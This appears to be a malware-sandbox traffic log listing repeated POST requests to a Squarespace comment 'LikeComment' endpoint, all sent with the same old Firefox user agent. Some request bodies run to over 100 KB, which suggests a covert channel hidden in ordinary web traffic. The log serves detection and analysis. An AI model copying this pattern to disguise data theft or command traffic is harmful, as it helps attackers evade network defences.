Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 332Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108468Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 116736Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
